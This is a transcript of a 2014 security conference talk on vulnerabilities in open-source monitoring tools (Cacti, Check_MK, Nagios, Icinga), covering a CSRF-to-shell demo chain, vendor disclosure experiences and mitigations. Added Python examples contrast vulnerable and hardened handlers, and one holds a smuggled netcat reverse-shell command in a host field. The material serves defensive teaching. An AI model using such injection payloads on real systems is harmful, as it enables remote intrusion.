OSMOSIS. Open Source Monitoring Security Issues HACKITO ERGO SUM 2014 / April 2014 / Paris
AGENDA
- Who are we?
- Open Source Monitoring Software
- Results
- Demonstration
- Responses
- Mitigations and conclusion
4/25/14
DEUTSCHE TELEKOM PROFILE
Customers & markets
- Customers: >141 m mobile customers, >32 m fixed-line customers, >17 m broadband customers, approx. 3 m (IP) TV customers, about 2 m workstation systems marketed
- Markets: presence in 50 countries; Germany, Europe, USA: using our own infrastructure; T-Systems: global presence and alliances via partners
Facts & figures (source: DT annual report to shareholders 2012 / TMUS annual report to shareholders 2012)
- Telekom in figures: revenue 58.7 bn, adjusted EBITDA 18.7 bn, free cash flow 6.4 bn; among the top 100 companies worldwide (#75 in the 2012 Fortune 500 list)
- Employees and responsibility: 235,000 employees worldwide; 9,000 trainees and cooperative degree students in Germany; pioneer on social issues (promotion of women, data privacy, climate protection etc.)
DEUTSCHE TELEKOM GROUP INFORMATION SECURITY
- Security levels, security strategies, standards, consulting, innovation, security requirements
- Privacy & Security Assessment (PSA)
- Deutsche Telekom Cyber Emergency Response Team (CERT)
- Implementation of measures, technology, testing, abuse handling, incident management
- Intelligent network solutions
OPEN SOURCE MONITORING SOFTWARE: OVERVIEW
Summary
- Critical function in a corporate network
- Lets you know how well the network is running
- End-to-end monitoring, from services down to a detailed hardware view
Joint functions in this case
- Web-based solution
- Agent-based
Out of scope
- No IDS / IPS
- No commercial solutions
- No security monitoring
OPEN SOURCE MONITORING SOFTWARE: THREATS
- Ubiquitous component in network environments
- Centralized access to multiple networks
- Usually positioned deep in the internal network (as in: a semi-trusted network)
- Used in nearly every environment (from small businesses through mid-range up to enterprises)
- MTAACA (machine that acts as client attack) and CTAMTAACA (clients that access machines that act as clients attack)
OPEN SOURCE MONITORING SOFTWARE: RISKS
- A more valuable target than perimeter systems
- Input data parsing (logfiles, SNMP, traps, ...)
- Web GUIs (OWASP Top 10 anyone?)
- Some have home-brew agents on EVERY system
- Potential access to a lot of components in the perimeter and the internal network
OPEN SOURCE MONITORING SOFTWARE: HOW IS IT IMPLEMENTED TYPICALLY?
(diagram: own checks, SNMP)
OPEN SOURCE MONITORING SOFTWARE: WHAT WE COVERED
- This is not an academic talk; we are talking about actual experience
- Open Source tools are easy to audit (kinda)
- Everyone has the chance to audit their own solution
- Focus on market-leading / industry-standard software
OPEN SOURCE MONITORING SOFTWARE: WHAT WE DID NOT COVER
- No commercial / closed-source solutions
- Architectural software flaws
- Critical features which should be disabled anyway (e.g. dont_blame_nrpe in nrpe.cfg)
- No additional plugins, features, add-ons
- Not the (home-brewed) agents themselves
OPEN SOURCE MONITORING SOFTWARE: TOOLS WE COVERED
- CACTI: "network graphing solution; frontend is completely PHP driven"
- NAGIOS: "Nagios Is The Industry Standard In IT Infrastructure Monitoring"
- CHECK_MK (NAGIOS ADD-ON): "Check_MK is a comprehensive add-on for the famous Open Source monitoring software Nagios"
- ICINGA: "Icinga is an enterprise grade open source monitoring system"
OPEN SOURCE MONITORING SOFTWARE: PUBLICLY KNOWN INCIDENTS
- CVE: remote buffer overflow in Nagios
- Hetzner (06/2013)
OPEN SOURCE MONITORING SOFTWARE: OTHER INTERESTING INFORMATION
- Public buffer overflow in CACTI (since 10/2013)
- NRPE: remote command exec (04/2014)
RESULTS: OVERALL
Critical issues were found in ALL audited solutions:
- Memory corruption: buffer/heap overflows, off-by-ones
- CSRF
- XSS
- eval-processing of untrusted input
- Remote code execution
- Arbitrary file access
Many web-based bugs, as all the solutions use web GUIs.
RESULTS: DETAILED VIEW
One column per audited solution, four columns in total (the product names of the columns are not preserved in this transcript; values are given in slide order, separated by "|"):
- Version: 3.5.0b | 1.9.1b | 1.2.2p | a
- Number of findings: (not legible in transcript)
- CVSS 2 score (highest finding): 4.9 (AV:N/AC:M/Au:S/C:P/I:N/A:P) | 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C) | 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C) | 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)
- Criticality: medium | high | high | high
- Number of open findings: 1* | 0 | 1** | 3
- Announcement to vendor / developer: 5th Dec | ..nd Dec | ..th Oct | ..th Oct
- Bug fix release: 3.5.x* | ..., 1.9.4, or latest release | ...p1, 1.2.5i2 or latest release | n/a
- Public DTAG CERT advisory: DTC-A... for each column (advisory numbers not legible in transcript)
- Remarks: * bug fixes only available in the source code, no update release available; ** exec of Python code within WATO
Confidential Christian Sielaff / OSMOSIS
DEMONSTRATION: CAN WE GET A SHELL?
DEMONSTRATION: NETWORK OVERVIEW
(diagram: Hacker, Terminal Server, Cacti / Check_MK, Administrator)
DEMONSTRATION: CACTI
Bugs: cross-site request forgery, command-line exec
Gets executed on the Cacti server if the administrator clicks on a link, or visits a malicious web site.
Pro:
- Get a shell
Con:
- Need to know the Cacti URL
- Admin needs to access the link, or a site containing the link, to trigger the exploit
- Outgoing connections may be restricted
- Admin needs to be logged in... not really, let's brute-force the admin account :)
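The Cacti chain above rests on two separate weaknesses: a state-changing request that is authorised by the session cookie alone (so a cross-site form post rides on the admin's browser), and a command line assembled from request input. The following is an added example written for this page, in Python rather than Cacti's PHP, and is not Cacti code; the endpoint, the `ping` action, the session store and the host-name rule are hypothetical. It shows the vulnerable handler beside a hardened one that checks the Origin header and a per-session synchronizer token and passes the argument as argv instead of through a shell. Commands are returned, not executed, so it runs offline.

```python
"""Added example (not Cacti code): a CSRF-able, command-building request
handler next to a hardened version. All names are hypothetical."""
import hmac
import re
import secrets

# Constructed session store: session id (from the cookie) -> CSRF token.
SESSIONS = {"sess-admin": secrets.token_hex(16)}

# Allow-list for the host argument: letters, digits, dots, dashes only.
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def build_ping_command_vulnerable(host):
    """String concatenation: anything in `host` becomes shell syntax once
    the string reaches os.system()/popen(). Returned here, not executed."""
    return "ping -c 1 " + host


def build_ping_command_safe(host):
    """argv list with a validated argument: no shell is involved, so shell
    metacharacters cannot alter the command, and bad input is rejected."""
    if not HOST_RE.match(host):
        raise ValueError("invalid host: %r" % host)
    return ["ping", "-c", "1", host]


def csrf_token_valid(session_id, submitted_token):
    """Synchronizer-token check: the token in the form body must equal the
    one bound to the session, compared in constant time."""
    expected = SESSIONS.get(session_id)
    if expected is None or submitted_token is None:
        return False
    return hmac.compare_digest(expected, submitted_token)


def handle_ping_vulnerable(cookie_session, form):
    """Authorised by the cookie alone. A form on an attacker's site posts
    here with the admin's cookie attached, and the attacker's `host`
    value reaches the shell string."""
    if cookie_session not in SESSIONS:
        return 403, None
    return 200, build_ping_command_vulnerable(form.get("host", ""))


def handle_ping_safe(cookie_session, form, origin, expected_origin):
    """Same action with CSRF and input defences. A cross-site post fails
    both checks: the browser sends the attacker's Origin, and the
    attacker's page cannot read the token out of the admin's session."""
    if cookie_session not in SESSIONS:
        return 403, None
    if origin != expected_origin:
        return 403, None
    if not csrf_token_valid(cookie_session, form.get("csrf_token")):
        return 403, None
    try:
        return 200, build_ping_command_safe(form.get("host", ""))
    except ValueError:
        return 400, None


if __name__ == "__main__":
    # Constructed attacker input as it would arrive in the forged form post.
    payload = "127.0.0.1; nc -e /bin/sh 10.0.0.5 4444"
    print(handle_ping_vulnerable("sess-admin", {"host": payload}))
    print(handle_ping_safe("sess-admin", {"host": payload},
                           "https://evil.example", "https://cacti.example"))
```

The Origin check alone is not enough (some clients omit the header, and an XSS on the same origin passes it), which is why the token check stays; and the token check alone does not fix the command injection, which is why the argv build stays. Brute-forcing the admin account, as the slide notes, defeats the "admin must be logged in" precondition but not the token, because the attacker then has a session of their own rather than the admin's browser.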
DEMONSTRATION: CHECK_MK
(diagram: Hacker, Terminal Server, Check_MK, Administrator)
DEMONSTRATION: CHECK_MK
Bugs: cross-site request forgery, command-line exec, cross-site scripting
What is the problem:
- Exploits a feature in WATO
- Uploads and executes a snapshot
- The snapshot contains plain Python code
Pro:
- Get a shell
Con:
- Need to know the Check_MK URL
- Admin needs to access the link, or a site containing the link, to trigger the exploit
- Outgoing connections may be restricted
- Admin needs to be logged in
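The WATO finding is an instance of the "eval-processing of untrusted input" class from the results: a configuration snapshot is Python source, and restoring it means executing whatever was uploaded. The following is an added example written for this page, not Check_MK code and not its fix; the snapshot contents are constructed and the allow-listed key names are assumptions. It contrasts the `exec()` loader pattern with a loader that accepts the same `name = <literal>` syntax by walking the AST and using `ast.literal_eval`, which evaluates literals only and never calls anything.

```python
"""Added example (not Check_MK code): executing an uploaded config file
versus parsing it as data. Snapshot contents and key names are constructed."""
import ast

# Constructed snapshot contents in a Check_MK-style "Python as config" format.
BENIGN_SNAPSHOT = """
all_hosts = ["web01|linux|prod", "db01|linux|prod"]
ipaddresses = {"web01": "10.0.0.11", "db01": "10.0.0.12"}
"""

# What an attacker uploads: a statement that is not an assignment at all.
MALICIOUS_SNAPSHOT = """
all_hosts = []
__import__("os").environ["OSMOSIS_MARKER"] = "executed"   # any code runs here
"""

# A subtler variant: a legitimate key whose value is a call, not a literal.
CALL_SNAPSHOT = 'all_hosts = __import__("os").listdir("/")\n'

ALLOWED_KEYS = {"all_hosts", "ipaddresses"}


def load_snapshot_unsafe(source):
    """The pattern behind the finding: exec() the file to obtain its
    variables. Every statement runs with the web server's privileges."""
    namespace = {}
    exec(source, namespace)  # deliberately unsafe, for contrast
    namespace.pop("__builtins__", None)
    return namespace


def load_snapshot_safe(source, allowed_keys=ALLOWED_KEYS):
    """Accept only `name = <literal>` for allow-listed names. Imports, calls,
    attribute access and subscript targets are rejected, not executed."""
    tree = ast.parse(source, mode="exec")
    config = {}
    for node in tree.body:
        if not isinstance(node, ast.Assign) or len(node.targets) != 1:
            raise ValueError("only simple assignments are allowed, got %s"
                             % type(node).__name__)
        target = node.targets[0]
        if not isinstance(target, ast.Name) or target.id not in allowed_keys:
            raise ValueError("unexpected config key")
        try:
            # literal_eval accepts an AST node and raises ValueError for
            # anything that is not a plain literal (Call, Attribute, ...).
            config[target.id] = ast.literal_eval(node.value)
        except ValueError:
            raise ValueError("non-literal value for %s" % target.id) from None
    return config


if __name__ == "__main__":
    print(load_snapshot_safe(BENIGN_SNAPSHOT))
    for bad in (MALICIOUS_SNAPSHOT, CALL_SNAPSHOT):
        try:
            load_snapshot_safe(bad)
        except ValueError as e:
            print("rejected:", e)
```

The safe loader still needs the surrounding controls the talk asks for (CSRF protection on the upload, an admin role restricted to people who should be able to change configuration), because a parsed config that points checks at attacker-chosen hosts is still a problem; what it removes is the direct code-execution primitive.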
DEMONSTRATION: CHECK_MK
What can we do better?
- Use the agent on a monitored system
- Re-use existing connections
Pro:
- Get a shell
- The URL is no longer needed
- The administrator does not need to click a link
- Triggers when the administrator logs in
- Uses existing connections
Con:
- Need (privileged) access to a monitored system
DEMONSTRATION: CHECK_MK
What else can we do? Just a simple SSH login?
An XSS triggers a CSRF, which triggers an upload, which triggers a shell :)
Pro:
- Get a shell
- The URL is no longer needed
- The administrator does not need to click a link
- Triggers when the administrator logs in
Con:
- Logwatch feature (default installation is fair)
- Outgoing connections may be restricted
DEMONSTRATION: CAN WE GET A SHELL? YES :)
RESPONSES: CONTACT AND TIMELINES
Contacting
- Some developers offer no contact option (except a public mailing list; is this a good idea in such a case?)
- Usually a contact is possible, also with a privacy option
- Only Icinga provides an option for private information sharing
Timeline
- Approximately six days from first response to a bug fix release: well done!
- Up to 85 days to a bug fix release
- Up to nothing until now :(
Advisories
- Flaws posted to Bugtraq on the 24th of March
- First responses regarding open findings on the 28th / 31st of March
RESPONSES: FEEDBACK
- "WHAT IS OWASP?" It's 2014, guys!
- "THIS IS A FEATURE" Yes, and a backdoor!
- "WHAT TOOLS DID YOU USE FOR SCANNING?" Hint: none, we had the source code. Duh!
- "WHY SHOULD WE FIX WHAT YOU SEE AS A SECURITY PROBLEM? WE NEVER ASKED FOR THIS AUDIT!" Approximately right. Remember it's open source? Open as in: I audit this code as much as I want to? As in: no response at all after the issues were committed to the developer.
RESPONSES: DISCLOSURE
Security fixes
- Change logs or release notes _never_ mention security fixes explicitly
- No hints or information on the developers' web sites!
- CVE? _Common_? Never heard about that
- Credits? What's that?
But there are some professionals
- The Icinga team has published bug fix releases (incl. back ports), requested CVE numbers and flagged the issues as security issues. MANY THANKS AND WELL DONE!
MITIGATIONS: BEST PRACTICES
- Consider the Icinga and Nagios security guidelines; nothing similar is available for Cacti and Check_MK
General basics
- Patching and regular updates
- OS and middleware hardening
- Minimal rights on the application level, but also on the operating system level
- Remove critical features (e.g. WATO in Check_MK)
- Passwords
MITIGATIONS: SEGREGATION
On the network level
- Do not place such systems flat in your corporate network
- Consider segregation based on functions, e.g. separate monitoring systems for dedicated services
- No internet for the admin workstations and the monitoring system (incl. ICMP, DNS, NTP, ...)
On the application level
- Segregate users and roles
MITIGATIONS: ARCHITECTURE
Agent-based monitoring
- Needs privileged rights to get all information, and listens on the network (often unauthenticated)
- Security of agents should be discussed separately
Check via SSH
- Must be secured carefully via the sshd configuration, otherwise it is a direct shell login
Solution
- Change the communication direction
- Based on Check_MK's agent it is just configuration; no additional software is needed
MITIGATIONS: ARCHITECTURE: HOW IT WORKS
1. Run the Check_MK agent locally and pipe its output to a file
2. Transfer the file securely, e.g. via SCP/SFTP
3. Configure the Check_MK Configuration & Check Engine to read its information from the local file
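Inverting the direction has one operational cost the three steps do not mention: if the push stops (cron dead, SSH key rotated, disk full), the server keeps reading the last file and the host looks healthy forever. The following is an added example written for this page, not Check_MK code: the server-side program that step 3 points Check_MK at, which emits the spooled agent output only if it is fresh and well-formed, so a stalled push surfaces as missing data. The spool directory, the maximum age, the file naming (one file per host, named after the host) and the `datasource_programs` wiring in the comment are assumptions; the agent output is constructed.

```python
"""Added example (not Check_MK code): datasource wrapper for a push-style
agent spool. Paths, max age and file naming are assumptions."""
import os
import sys
import time

SPOOL_DIR = "/var/spool/osmosis-agent"   # assumed: where scp/sftp drops files
MAX_AGE_SECONDS = 300                     # assumed: tolerate two missed 2-min pushes

# Constructed agent output in the Check_MK agent's <<<section>>> format.
SAMPLE_OUTPUT = (
    "<<<check_mk>>>\nVersion: 1.2.2p3\nAgentOS: linux\n"
    "<<<uptime>>>\n123456.78 98765.43\n"
    "<<<df>>>\n/dev/sda1 ext4 20000000 5000000 15000000 25% /\n"
)


def parse_sections(text):
    """Split agent output into {section_name: [lines]}. Lines before the
    first <<<...>>> header are ignored; options after ':' are dropped."""
    sections, current = {}, None
    for line in text.splitlines():
        if line.startswith("<<<") and line.endswith(">>>"):
            current = line[3:-3].split(":")[0]
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def is_plausible(text):
    """Reject an empty or truncated upload: a real agent run starts with a
    check_mk section that carries a Version line."""
    sections = parse_sections(text)
    return ("check_mk" in sections
            and any(l.startswith("Version:") for l in sections["check_mk"]))


def spool_is_fresh(mtime, now=None, max_age=MAX_AGE_SECONDS):
    """True only if the file was written within max_age seconds (and not in
    the future, which would indicate clock trouble on the pushing host)."""
    now = time.time() if now is None else now
    return 0 <= now - mtime <= max_age


def emit_spool(host, spool_dir=SPOOL_DIR, now=None):
    """Return the agent output to hand to Check_MK, or None when the push
    is missing, stale or malformed (caller exits non-zero)."""
    path = os.path.join(spool_dir, os.path.basename(host))  # no traversal via host
    try:
        st = os.stat(path)
        with open(path) as fh:
            text = fh.read()
    except OSError:
        return None
    if not spool_is_fresh(st.st_mtime, now) or not is_plausible(text):
        return None
    return text


if __name__ == "__main__":
    # Assumed main.mk wiring (Check_MK 1.2.x style), so the engine never
    # opens a TCP connection to the monitored host:
    #   datasource_programs = [("/usr/local/bin/emit_spool.py <HOST>", ALL_HOSTS)]
    out = emit_spool(sys.argv[1])
    if out is None:
        sys.exit(1)
    sys.stdout.write(out)
```

On the pushing host the matching half is an unprivileged cron job that runs the agent, writes to a temporary file and renames it into place before the transfer, so the server never reads a half-written file; the SSH key used for the copy should be restricted to the spool path (a forced command or an SFTP chroot) so that a compromised monitored host gains nothing but the ability to overwrite its own spool file.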
MITIGATIONS: ARCHITECTURE: OWN CHECKS
(diagram)
CONCLUSION
- Take care of the solutions you use, including additional features, add-ons, plug-ins, self-written checks and the architecture.
- Just because it is named Open Source does not mean it is secure by itself!
- In general, Open Source monitoring solutions are not more or less secure than commercial ones.
- Strongly isolate administrator workstations and your monitoring system.
- Check OWASP regularly!
More informationSmart (and safe) Lighting:
Smart (and safe) Lighting: An Overview of Cyber Security October 29, 2015 Jason Brown CISO, Merit Network Agenda 2 The New Normal Discuss Methodologies of Security Recap Q & A Target Hack 3 40,000 credit
More informationKEN VAN WYK. Fundamentals of Secure Coding and how to break Software MARCH 19-23, 2007 RESIDENZA DI RIPETTA - VIA DI RIPETTA, 231 ROME (ITALY)
TECHNOLOGY TRANSFER PRESENTS KEN VAN WYK Fundamentals of Secure Coding and how to break Software MARCH 19-23, 2007 RESIDENZA DI RIPETTA - VIA DI RIPETTA, 231 ROME (ITALY) info@technologytransfer.it www.technologytransfer.it
More informationCCM 4350 Week 11. Security Architecture and Engineering. Guest Lecturer: Mr Louis Slabbert School of Science and Technology.
CCM 4350 Week 11 Security Architecture and Engineering Guest Lecturer: Mr Louis Slabbert School of Science and Technology CCM4350_CNSec 1 Web Server Security The Web is the most visible part of the net
More informationWeb Application Vulnerability Testing with Nessus
The OWASP Foundation http://www.owasp.org Web Application Vulnerability Testing with Nessus Rïk A. Jones, CISSP rikjones@computer.org Rïk A. Jones Web developer since 1995 (16+ years) Involved with information
More informationSitefinity Security and Best Practices
Sitefinity Security and Best Practices Table of Contents Overview The Ten Most Critical Web Application Security Risks Injection Cross-Site-Scripting (XSS) Broken Authentication and Session Management
More informationSecurity Testing and Vulnerability Management Process. e-governance
Security Testing and Vulnerability Management Process for e-governance Draft DEPARTMENT OF ELECTRONICS AND INFORMATION TECHNOLOGY Ministry of Communication and Information Technology, Government of India.
More informationDatabase Security Guide
Institutional and Sector Modernisation Facility ICT Standards Database Security Guide Document number: ISMF-ICT/3.03 - ICT Security/MISP/SD/DBSec Version: 1.10 Project Funded by the European Union 1 Document
More informationASL IT SECURITY BEGINNERS WEB HACKING AND EXPLOITATION
ASL IT SECURITY BEGINNERS WEB HACKING AND EXPLOITATION V 2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: Learn the various attacks like sql injections, cross site scripting, command execution
More informationSANDCAT THE WEB APPLICATION SECURITY ASSESSMENT SUITE WHAT IS SANDCAT? MAIN COMPONENTS. Web Application Security
SANDCAT WHAT IS SANDCAT? THE WEB APPLICATION SECURITY ASSESSMENT SUITE Sandcat is a hybrid multilanguage web application security assessment suite - a software suite that simulates web-based attacks. Sandcat
More informationFINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES
Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that
More informationCMPT 471 Networking II
CMPT 471 Networking II Firewalls Janice Regan, 2006-2013 1 Security When is a computer secure When the data and software on the computer are available on demand only to those people who should have access
More informationCommon Security Vulnerabilities in Online Payment Systems
Common Security Vulnerabilities in Online Payment Systems Author- Hitesh Malviya(Information Security analyst) Qualifications: C!EH, EC!SA, MCITP, CCNA, MCP Current Position: CEO at HCF Infosec Limited
More informationJuniper Networks Secure
White Paper Juniper Networks Secure Development Lifecycle Six Practices for Improving Product Security Copyright 2013, Juniper Networks, Inc. 1 Table of Contents Executive Summary...3 Introduction...3
More informationHIPAA Compliance Use Case
Overview HIPAA Compliance helps ensure that all medical records, medical billing, and patient accounts meet certain consistent standards with regard to documentation, handling, and privacy. Current Situation
More informationRecon and Mapping Tools and Exploitation Tools in SamuraiWTF Report section Nick Robbins
Recon and Mapping Tools and Exploitation Tools in SamuraiWTF Report section Nick Robbins During initial stages of penetration testing it is essential to build a strong information foundation before you
More informationNCS 330. Information Assurance Policies, Ethics and Disaster Recovery. NYC University Polices and Standards 4/15/15.
NCS 330 Information Assurance Policies, Ethics and Disaster Recovery NYC University Polices and Standards 4/15/15 Jess Yanarella Table of Contents: Introduction: Part One: Risk Analysis Threats Vulnerabilities
More informationA43. Modern Hacking Techniques and IP Security. By Shawn Mullen. Las Vegas, NV IBM TRAINING. IBM Corporation 2006
IBM TRAINING A43 Modern Hacking Techniques and IP Security By Shawn Mullen Las Vegas, NV 2005 CSI/FBI US Computer Crime and Computer Security Survey 9 out of 10 experienced computer security incident in
More informationPatch and Vulnerability Management Program
Patch and Vulnerability Management Program What is it? A security practice designed to proactively prevent the exploitation of IT vulnerabilities within an organization To reduce the time and money spent
More informationWindows Remote Access
Windows Remote Access A newsletter for IT Professionals Education Sector Updates Issue 1 I. Background of Remote Desktop for Windows Remote Desktop Protocol (RDP) is a proprietary protocol developed by
More informationACS 5.x and later: Integration with Microsoft Active Directory Configuration Example
ACS 5.x and later: Integration with Microsoft Active Directory Configuration Example Document ID: 113571 Contents Introduction Prerequisites Requirements Components Used Conventions Background Information
More informationDFW INTERNATIONAL AIRPORT STANDARD OPERATING PROCEDURE (SOP)
Title: Functional Category: Information Technology Services Issuing Department: Information Technology Services Code Number: xx.xxx.xx Effective Date: xx/xx/2014 1.0 PURPOSE 1.1 To appropriately manage
More informationAN OVERVIEW OF VULNERABILITY SCANNERS
AN OVERVIEW OF VULNERABILITY SCANNERS February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole
More informationOffensive Security. Advanced Web Attacks and Exploitation. Mati Aharoni Devon Kearns. v. 1.0
Offensive Security Advanced Web Attacks and Exploitation v. 1.0 Mati Aharoni Devon Kearns Course Overview The days of porous network perimeters are fading fast as services become more resilient and harder
More informationMembers of the UK cyber security forum. Soteria Health Check. A Cyber Security Health Check for SAP systems
Soteria Health Check A Cyber Security Health Check for SAP systems Soteria Cyber Security are staffed by SAP certified consultants. We are CISSP qualified, and members of the UK Cyber Security Forum. Security
More informationHardening Joomla! (MNI)
Hardening Joomla! (MNI) Web Security SS10 Prof. Dr. Klaus Quibeldey-Cirkel 1 Content Introduction Giessen Aegis Suhosin Security Tests Live Demonstration Conclusion 2 Introduction Project Goal: Implementation
More informationCyber Exploits: Improving Defenses Against Penetration Attempts
Cyber Exploits: Improving Defenses Against Penetration Attempts Mark Burnette, CPA, CISA, CISSP, CISM, CGEIT, CRISC, QSA LBMC Security & Risk Services Today s Agenda Planning a Cyber Defense Strategy How
More informationCOURSE NAME: INFORMATION SECURITY INTERNSHIP PROGRAM
COURSE NAME: INFORMATION SECURITY INTERNSHIP PROGRAM Course Description This is the Information Security Training program. The Training provides you Penetration Testing in the various field of cyber world.
More information